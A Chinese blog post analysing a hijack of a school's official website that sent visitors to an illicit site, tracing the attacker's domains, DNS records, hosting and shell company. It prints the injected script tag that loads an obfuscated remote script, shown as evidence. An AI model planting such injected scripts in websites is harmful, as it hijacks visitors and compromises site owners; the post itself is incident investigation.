蚌埠铁路中学官网被攻击事件分析
5月12日中午,蚌埠铁路中学官方出现了一件离谱的事。从微信“蚌埠铁路中学”公众号进入铁中官网,会进入不良网站。直到下午一点,网站才关闭。从浏览器打开是这样的:
但是解析到的 ip 是 60.170.253.4,确实是铁中。
从浏览器直接访问蚌埠铁路中学官方依旧是 https://www.bbtlzx.com,而微信打开的是 http://www.bbtlzx.com/index.aspx,问题就出在这个后缀上。不仅是 index.aspx 和 index.html,只要链接后面带上任意路径,都会打开不良网站,铁中官网真的被攻击了。
查看一下 html,就一行:
<script src="https://tz.[马赛克].com/nn.js"></script>把这个脚本下载下来,里面的代码经过混淆,唯一正常的地方是判断 UA。但是这个脚本用脚趾头想都知道是干什么的——它会打开一个新的页面。
经过一番操作(我知道大家不想看具体流程),我们得到了这三个链接和几个标签(LINK,STYLE,SCRIPT,IFRAME,DIV):
https://hm.baidu.com/https://hm.baidu.com/hm.js?333b84ee83b6ca1f3b6184a73cc31e7fhttps://bz5122.[马赛克].com/2024/mm/nn.html
(它甚至用了百度统计)
接着重头戏来了:ping 一下,发现解析到的 ip 全是国内 ip,也就是说这个域名有备案。去工信部查一下,沪ICP备2024095047号,上海蒂芬分网络科技。
那么有人可能又要说了,会不会是二级备案域名分发或者是备案域名忘续费了之类的?但是企业注册时间是 24 年 8 月 8 日,而域名注册时间是 24 年 8 月 30 日(28 年 8 月 30 日到期),很明显没有中断过。
接着是第二个——这个域名的 NS 记录是华为云。而且不仅仅是这么简单。查一下 DNS 记录可知,除了 NS 记录外,还有一个 SOA 记录,两个 A 记录和 6 个 CNAME 记录(6 个子域)。那两个 A 记录能通的 ip 就一个,113.45.12.80,是华为云。而且那六个 CNAME 到的域名的主域是 cdnhwcpsd13.com,黔ICP备20004760号-27,华为云的 CDN。
正常能在国内访问的,大多是一个便宜/监管宽松的域名 + 境外服务器,并且非常小心翼翼。这倒好,国内服务器 + 备案域名,而且攻击公立学校的官网。
至于公司……一个已经注销的注册资金 10w 的空壳公司。
但是这里有个问题,既然公司已经注销,为什么不把备案注销了?而且从域名时间可以看出,中间并没有过到期,现在也还是正常状态,别人是改不了 DNS 记录的。
其它
它的 6 个子域中,fa6133、bz5122、ha1366、xa1455 可以通过 2024/mm/nn.html 这个目录打开不良网站,只有站点名称和图标等细微差别。
而且 fa6133 和 bz5122 共用一个证书,ha1366 和 xa1455 共用一个证书。
还有剩下两个子域 xj2199 和 ttk112,虽然打不开,但前面的一些静态资源又存在上面,而且这两个页面之间也不一样。
还有一个凑巧的事:碰巧发现的 http://fa6133.[马赛克].com/index.css